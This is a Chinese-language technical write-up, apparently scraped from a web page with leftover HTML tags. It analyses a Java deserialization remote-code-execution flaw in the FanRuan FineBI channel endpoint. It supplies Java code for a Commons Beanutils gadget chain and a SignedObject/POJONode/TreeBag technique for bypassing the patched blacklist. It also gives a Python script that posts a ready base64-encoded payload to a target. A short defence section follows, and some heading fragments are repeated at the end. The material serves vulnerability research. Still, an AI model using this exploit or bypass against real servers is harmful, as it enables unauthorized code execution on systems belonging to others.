帆软Channel接口反序列化漏洞分析与利用技术文档<\/h1>

1. 漏洞概述<\/h2>
帆软报表系统（FineBi）的`\/webroot\/decision\/remote\/design\/channel<\/code>接口存在反序列化漏洞，攻击者可通过精心构造的序列化数据实现远程代码执行。该漏洞影响FineBi 5.1.0及之前版本，5.1.18版本通过黑名单机制进行了修复，但仍可通过二次反序列化技术绕过。<\/p>`

2. 漏洞环境<\/h2>

受影响版本：FineBi 5.1.0<\/li>
修复版本：FineBi 5.1.18（存在绕过可能）<\/li>
漏洞接口：\/webroot\/decision\/remote\/design\/channel<\/code><\/li>
<\/ul>
3. 漏洞分析<\/h2>
3.1 漏洞调用链<\/h3>

请求到达com.fr.decision.extension.report.api.remote.RemoteDesignResource<\/code>类的onMessage<\/code>方法<\/li>
调用WorkContext.handleMessage<\/code>方法<\/li>
调用WorkspaceServerInvoker.handleMessage<\/code>方法<\/li>
调用WorkspaceServerInvoker.deserializeInvocation<\/code>方法<\/li>
使用SerializerHelper.deserialize<\/code>对输入流进行反序列化<\/li>
最终调用InvocationSerializer.deserialize<\/code>方法中的readObject<\/code><\/li>
<\/ol>
3.2 关键代码路径<\/h3>
\/\/ 入口点
<\/span><\/span><\/span><\/span>com.<\/span>fr<\/span>.<\/span>decision<\/span>.<\/span>extension<\/span>.<\/span>report<\/span>.<\/span>api<\/span>.<\/span>remote<\/span>.<\/span>RemoteDesignResource<\/span>.<\/span>onMessage<\/span>
<\/span><\/span>  →<\/span> com.<\/span>fr<\/span>.<\/span>workspace<\/span>.<\/span>WorkContext<\/span>.<\/span>handleMessage<\/span>
<\/span><\/span>    →<\/span> com.<\/span>fr<\/span>.<\/span>workspace<\/span>.<\/span>engine<\/span>.<\/span>rpc<\/span>.<\/span>WorkspaceServerInvoker<\/span>.<\/span>handleMessage<\/span>
<\/span><\/span>      →<\/span> com.<\/span>fr<\/span>.<\/span>workspace<\/span>.<\/span>engine<\/span>.<\/span>rpc<\/span>.<\/span>WorkspaceServerInvoker<\/span>.<\/span>deserializeInvocation<\/span>
<\/span><\/span>        →<\/span> com.<\/span>fr<\/span>.<\/span>serialization<\/span>.<\/span>SerializerHelper<\/span>.<\/span>deserialize<\/span>
<\/span><\/span>          →<\/span> com.<\/span>fr<\/span>.<\/span>serialization<\/span>.<\/span>GZipSerializerWrapper<\/span>.<\/span>deserialize<\/span>
<\/span><\/span>            →<\/span> com.<\/span>fr<\/span>.<\/span>rpc<\/span>.<\/span>serialization<\/span>.<\/span>InvocationSerializer<\/span>.<\/span>deserialize<\/span>
<\/span><\/span>              →<\/span> ObjectInputStream.<\/span>readObject<\/span>()<\/span> \/\/ 反序列化触发点
<\/span><\/span><\/span><\/code><\/pre>3.3 序列化处理流程<\/h3>

输入流被包装为GZIPInputStream<\/code>对象<\/li>
使用GZipSerializerWrapper<\/code>进行反序列化<\/li>
最终调用InvocationSerializer<\/code>的deserialize<\/code>方法执行反序列化<\/li>
<\/ol>
4. 利用技术<\/h2>
4.1 基本利用链（CB链）<\/h3>
FineBi集成了Commons Beanutils（CB）依赖，可使用CB链进行利用：<\/p>
TemplatesImpl →<\/span> BeanComparator →<\/span> PriorityQueue
<\/span><\/span><\/code><\/pre>4.1.1 利用代码生成<\/h4>
\/\/ 创建恶意TemplatesImpl对象
<\/span><\/span><\/span><\/span>TemplatesImpl templates =<\/span> new<\/span> TemplatesImpl();<\/span>
<\/span><\/span>\/\/ 设置_bytecodes字段（恶意类字节码）
<\/span><\/span><\/span><\/span>byte<\/span>[][]<\/span> payloads =<\/span> {<\/span>generateEvilClass()};<\/span>
<\/span><\/span>bytecodes.<\/span>set<\/span>(<\/span>templates,<\/span> payloads);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建BeanComparator
<\/span><\/span><\/span><\/span>BeanComparator beanComparator =<\/span> new<\/span> BeanComparator(<\/span>null<\/span>,<\/span> String.<\/span>CASE_INSENSITIVE_ORDER<\/span>);<\/span>
<\/span><\/span>\/\/ 设置property为"outputProperties"
<\/span><\/span><\/span><\/span>property.<\/span>set<\/span>(<\/span>beanComparator,<\/span> "outputProperties"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建PriorityQueue并设置queue数组
<\/span><\/span><\/span><\/span>PriorityQueue queue =<\/span> new<\/span> PriorityQueue(<\/span>2<\/span>,<\/span> beanComparator);<\/span>
<\/span><\/span>queue.<\/span>add<\/span>(<\/span>"a"<\/span>);<\/span> queue.<\/span>add<\/span>(<\/span>"b"<\/span>);<\/span>
<\/span><\/span>queue1.<\/span>set<\/span>(<\/span>queue,<\/span> new<\/span> Object[]{<\/span>templates,<\/span>templates});<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ GZIP压缩序列化数据
<\/span><\/span><\/span><\/span>ByteArrayOutputStream baos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>GZIPOutputStream gos =<\/span> new<\/span> GZIPOutputStream(<\/span>baos);<\/span>
<\/span><\/span>gos.<\/span>write<\/span>(<\/span>serializedData);<\/span>
<\/span><\/span>gos.<\/span>finish<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>4.1.2 注意事项<\/h4>

需要使用Commons Beanutils 1.8.3版本生成payload（1.9.2版本会导致InvalidClassException<\/code>）<\/li>
数据需要经过GZIP压缩<\/li>
<\/ul>
4.2 绕过黑名单的二次反序列化技术<\/h3>
FineBi 5.1.18通过黑名单机制修复了漏洞，但可通过二次反序列化绕过：<\/p>
4.2.1 技术原理<\/h4>
利用SignedObject<\/code>类进行二次反序列化：<\/p>

SignedObject<\/code>的getObject<\/code>方法会对其内部存储的对象进行反序列化<\/li>
通过Jackson的POJONode<\/code>触发getObject<\/code>调用<\/li>
使用TreeBag<\/code>调用链最终触发POJONode.toString<\/code><\/li>
<\/ol>
4.2.2 完整调用链<\/h4>
TreeBag.readObject
  → TreeMap.put
    → TreeMap.compare
      → ClassComparator.compare
        → VersionComparator.compare
          → POJONode.toString
            → SignedObject.getObject
              → \/\/ 二次反序列化触发CB链
<\/code><\/pre>
4.2.3 关键实现代码<\/h4>
\/\/ 1. 创建初始CB链
<\/span><\/span><\/span><\/span>PriorityQueue queue =<\/span> ...;<\/span> \/\/ 同基本利用链
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 2. 封装为SignedObject
<\/span><\/span><\/span><\/span>KeyPairGenerator kpg =<\/span> KeyPairGenerator.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>);<\/span>
<\/span><\/span>kpg.<\/span>initialize<\/span>(<\/span>1024<\/span>);<\/span>
<\/span><\/span>KeyPair kp =<\/span> kpg.<\/span>generateKeyPair<\/span>();<\/span>
<\/span><\/span>SignedObject dso =<\/span> new<\/span> SignedObject(<\/span>queue,<\/span> kp.<\/span>getPrivate<\/span>(),<\/span> Signature.<\/span>getInstance<\/span>(<\/span>"DSA"<\/span>));<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 3. 封装为POJONode
<\/span><\/span><\/span><\/span>POJONode node =<\/span> new<\/span> POJONode(<\/span>dso);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 4. 创建TreeBag调用链
<\/span><\/span><\/span><\/span>ClassComparator classComparator =<\/span> new<\/span> ClassComparator(<\/span>"org.freehep.util.VersionComparator"<\/span>);<\/span>
<\/span><\/span>TreeBag treeBag =<\/span> new<\/span> TreeBag(<\/span>classComparator);<\/span>
<\/span><\/span>treeBag.<\/span>add<\/span>(-<\/span>1<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 5. 通过反射设置TreeBag的root.key为POJONode
<\/span><\/span><\/span><\/span>Field map =<\/span> treeBag.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"map"<\/span>);<\/span>
<\/span><\/span>Map treeMap =<\/span> (<\/span>Map)<\/span> map.<\/span>get<\/span>(<\/span>treeBag);<\/span>
<\/span><\/span>Field root =<\/span> treeMap.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"root"<\/span>);<\/span>
<\/span><\/span>Map.<\/span>Entry<\/span> mapEnter =<\/span> (<\/span>Map.<\/span>Entry<\/span>)<\/span> root.<\/span>get<\/span>(<\/span>treeMap);<\/span>
<\/span><\/span>Field key =<\/span> mapEnter.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"key"<\/span>);<\/span>
<\/span><\/span>key.<\/span>set<\/span>(<\/span>mapEnter,<\/span> node);<\/span>
<\/span><\/span><\/code><\/pre>4.2.4 绕过黑名单的关键点<\/h4>

使用SignedObject<\/code>绕过对直接反序列化类的检查<\/li>
利用Jackson的序列化机制触发getObject<\/code>调用<\/li>
通过ClassComparator<\/code>动态加载VersionComparator<\/code>类（不在黑名单中）<\/li>
<\/ol>
4.3 实际利用脚本<\/h3>
import<\/span> requests,<\/span> base64
<\/span><\/span>
<\/span><\/span>host =<\/span> "http:\/\/target:port\/"<\/span>
<\/span><\/span>payload =<\/span> "H4sIAAAAAAAAAGWTT2sTQRjGn9lNkzRNaxtta70Jgm2FXcWDYMU\/DQjBUKst9pBCmGyGuLKZXWdm261gD\/0AnvwW9lIQFQ+CVw9614sXjx7EiyBW381G09pd2Jl5Zt73mfc3s7tfMaQVph\/wDe7Exg+cZeWHyjdbd2IRi6cfzz\/\/eW1nz4ZVQ077j0QdJS\/sRlxxEyqDqXoa6aaRbvWfvpBEACxKfC5UHYdH3LsvHIrrhlI7LcFlGqCdReoNoj48YTv7S9+2LViHXB5iG6yOYqTCSCizZVDJXAMuO+6KUb7skCO5zffKSGUnk89UuRa1qYXUvvE3xMBs015\/vL785b0FJJHBeBibKDbLmYUv9GaOKrAp52XaiKNj6RyoJOHk4fjSCCV54CQ6MJ5jFE+cVdGNAm6ErlE7vHb7rdx9dtFGvobRpi\/bQpqluNsSqoaxJgVIHQhTIz1poNRsbRnhhW2hDexGY7GBfNMLuKZhpXGg4mqqLdQx1JS8K1I6uTommv9XcPhwBnp2OPhNT6x6Rrd+zUx2Op8u9VjQFCPdaizufp\/+kS+ufu7LzHu3\/\/oNTV\/ADEM+lEHI2wUwhuuEyCVELiFyM0RuD5H7F5HbQ+SqWBq\/K9wbLU3Fe2a1T6AAmzJe8aVvrjLYs3P3GHJVIkETZQwhX0IRwwwTAwh3s1QFjDCUOsL0xwyTs3P1I8sWyhjFWAllHKPMHg+8IiaoJxLhMZydPXqfDiYhdp4g5GUcx4k0ySR5roSx8sRNPyDPkQyGk4bgNCykl4eI0Uubp2+BRqdIZ9SOzb9E6RXGK5UXmFrb66+cTn8YnKSraHPOo02GJD3Z0eQPQVjlt6IDAAA="<\/span>
<\/span><\/span>data =<\/span> base64.<\/span>b64decode(payload)
<\/span><\/span>
<\/span><\/span>res =<\/span> requests.<\/span>post(url=<\/span>host+<\/span>"\/webroot\/decision\/remote\/design\/channel"<\/span>, 
<\/span><\/span>                   data=<\/span>data,
<\/span><\/span>                   verify=<\/span>False<\/span>)
<\/span><\/span>print(res.<\/span>text)
<\/span><\/span><\/code><\/pre>5. 修复与防御<\/h2>
5.1 官方修复方式（5.1.18版本）<\/h3>

使用JDKSerializer.CustomObjectInputStream<\/code>封装输入流<\/li>
实现resolveClass<\/code>方法检查黑名单<\/li>
黑名单位于com.fr.serialization.blacklist.txt<\/code><\/li>
<\/ol>
5.2 黑名单内容<\/h3>
黑名单包含常见利用链相关类，如：<\/p>

Commons Beanutils相关类<\/li>
Commons Collections相关类<\/li>
JDK危险类（如PriorityQueue<\/code>）<\/li>
其他常见危险类（如TemplatesImpl<\/code>）<\/li>
<\/ul>
5.3 防御建议<\/h3>

升级到最新版本<\/li>
实施输入验证和过滤<\/li>
限制反序列化操作<\/li>
使用白名单机制替代黑名单<\/li>
<\/ol>
6. 技术难点与解决方案<\/h2>
6.1 版本兼容性问题<\/h3>
问题<\/strong>：Commons Beanutils 1.9.2生成的payload不兼容

解决<\/strong>：使用1.8.3版本生成payload<\/p>
6.2 提前触发问题<\/h3>
问题<\/strong>：直接添加POJONode<\/code>会提前触发漏洞

解决<\/strong>：<\/p>

先添加无害对象<\/li>
通过反射修改TreeBag<\/code>内部数据<\/li>
<\/ol>
treeBag.<\/span>add<\/span>(-<\/span>1<\/span>);<\/span> \/\/ 先添加无害对象
<\/span><\/span><\/span>\/\/ 通过反射修改为恶意POJONode
<\/span><\/span><\/span><\/span>Field map =<\/span> treeBag.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"map"<\/span>);<\/span>
<\/span><\/span>\/\/ ... 反射设置root.key
<\/span><\/span><\/span><\/code><\/pre>6.3 序列化异常问题<\/h3>
问题<\/strong>：BaseJsonNode<\/code>的writeReplace<\/code>方法导致序列化异常

解决<\/strong>：使用Javassist移除该方法<\/p>
CtClass ctClass =<\/span> ClassPool.<\/span>getDefault<\/span>().<\/span>get<\/span>(<\/span>"com.fr.third.fasterxml.jackson.databind.node.BaseJsonNode"<\/span>);<\/span>
<\/span><\/span>CtMethod writeReplace =<\/span> ctClass.<\/span>getDeclaredMethod<\/span>(<\/span>"writeReplace"<\/span>);<\/span>
<\/span><\/span>ctClass.<\/span>removeMethod<\/span>(<\/span>writeReplace);<\/span>
<\/span><\/span>ctClass.<\/span>toClass<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>7. 参考资源<\/h2>

Java反序列化漏洞的一些利用链分析<\/a><\/li>
帆软报表反序列化漏洞分析<\/a><\/li>
二次反序列化技术研究<\/a><\/li>
黑名单绕过技术<\/a><\/li>
<\/ol>
8. 总结<\/h2>
帆软Channel接口反序列化漏洞展示了反序列化漏洞的典型利用方式及防御绕过技术。通过分析该漏洞，我们可以深入理解：<\/p>

Java反序列化漏洞的利用原理<\/li>
黑名单机制的局限性<\/li>
二次反序列化绕过技术<\/li>
实际漏洞利用中的各种边界条件处理<\/li>
<\/ol>
该案例为研究Java反序列化安全提供了宝贵的学习材料，也强调了设计安全的反序列化机制的重要性。<\/p>
帆软Channel接口反序列化漏洞分析与利用技术文档<\/h1>

3. 漏洞分析<\/h2>

4. 利用技术<\/h2>

4.2 绕过黑名单的二次反序列化技术<\/h3> FineBi 5.1.18通过黑名单机制修复了漏洞，但可通过二次反序列化绕过：<\/p>

5. 修复与防御<\/h2>

6. 技术难点与解决方案<\/h2>

6.1 版本兼容性问题<\/h3> 问题<\/strong>：Commons Beanutils 1.9.2生成的payload不兼容 解决<\/strong>：使用1.8.3版本生成payload<\/p>

4.2 绕过黑名单的二次反序列化技术<\/h3>
FineBi 5.1.18通过黑名单机制修复了漏洞，但可通过二次反序列化绕过：<\/p>

6.1 版本兼容性问题<\/h3>
问题<\/strong>：Commons Beanutils 1.9.2生成的payload不兼容
解决<\/strong>：使用1.8.3版本生成payload<\/p>
